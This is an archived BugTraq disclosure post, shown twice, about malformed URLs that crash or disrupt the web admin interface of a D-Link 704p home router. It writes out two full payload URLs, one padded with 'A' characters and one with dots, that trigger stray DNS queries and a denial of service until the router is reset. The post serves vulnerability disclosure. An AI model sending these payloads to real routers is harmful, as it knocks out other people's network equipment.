BugTraq
Back to list
|
Post reply
Buffer Overflow? Local Malformed URL attack on D-Link 704p router
May 26 2003 05:53AM
Chris R (admin securityindex net)
My home network uses a small 4 port broadband Dlink router (704p) The
firmware was updated a week ago.
The following malformed URL's cause odd behavior in the router. Pointing
your browser (like most routers) to the gateways internal IP address you
get a web interface for administering your router.
http://192.168.0.1/syslog.htm?
D=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
This URL caused the router to do a DNS query on:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (at) xxxx.xx.comcast (dot) net [email concealed]
"@xxxx.xx.comcast.net" is the trailing end of my hostname (i replaced the
real trailing host name with x's as to not give up my location! heh)
Subsequently there was a DNS response "no such name"
Enough of these malformed URLS causes the DNS server to DoS the router for
a short time because a DNS response packet is much larger then a DNS query
packet.
This URL also caused an error in the routers log file page, the URL
made the page look odd. This router uses CSS to display its tabs and log
file (syslog.htm). Some of the HTML was visible within the CSS that were
now repeating across the page. I took a screen shot and uploaded it to my
webspace.
http://www.securityindex.net/router.JPG
---
http://192.168.0.1/syslog.htm?
D=......................................................................
...
........................................................................
...
........................................................................
...
........................................................................
...
........................................................................
...
........................................................................
...
........................................................................
...
........................................................................
...
........................................................................
...
........................................................................
...
....................
This malformed URL caused the router to stop responding. Requesting this
url over and over will eventually render the router useless until reset.
You can still access the internet after sending this url once but the
routers configuration page does not respond until you reset the router.
-->
i sent an email to dlink containing a copy of this post. Thanx
-->
--chris
www.securityindex.net
-apex security group-
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
My home network uses a small 4 port broadband Dlink router (704p) The
firmware was updated a week ago.
The following malformed URL's cause odd behavior in the router. Pointing
your browser (like most routers) to the gateways internal IP address you
get a web interface for administering your router.
http://192.168.0.1/syslog.htm?
D=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
This URL caused the router to do a DNS query on:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (at) xxxx.xx.comcast (dot) net [email concealed]
"@xxxx.xx.comcast.net" is the trailing end of my hostname (i replaced the
real trailing host name with x's as to not give up my location! heh)
Subsequently there was a DNS response "no such name"
Enough of these malformed URLS causes the DNS server to DoS the router for
a short time because a DNS response packet is much larger then a DNS query
packet.
This URL also caused an error in the routers log file page, the URL
made the page look odd. This router uses CSS to display its tabs and log
file (syslog.htm). Some of the HTML was visible within the CSS that were
now repeating across the page. I took a screen shot and uploaded it to my
webspace.
http://www.securityindex.net/router.JPG
---
http://192.168.0.1/syslog.htm?
D=......................................................................
...
........................................................................
...
........................................................................
...
........................................................................
...
........................................................................
...
........................................................................
...
........................................................................
...
........................................................................
...
........................................................................
...
........................................................................
...
....................
This malformed URL caused the router to stop responding. Requesting this
url over and over will eventually render the router useless until reset.
You can still access the internet after sending this url once but the
routers configuration page does not respond until you reset the router.
-->
i sent an email to dlink containing a copy of this post. Thanx
-->
--chris
www.securityindex.net
-apex security group-
[ reply ]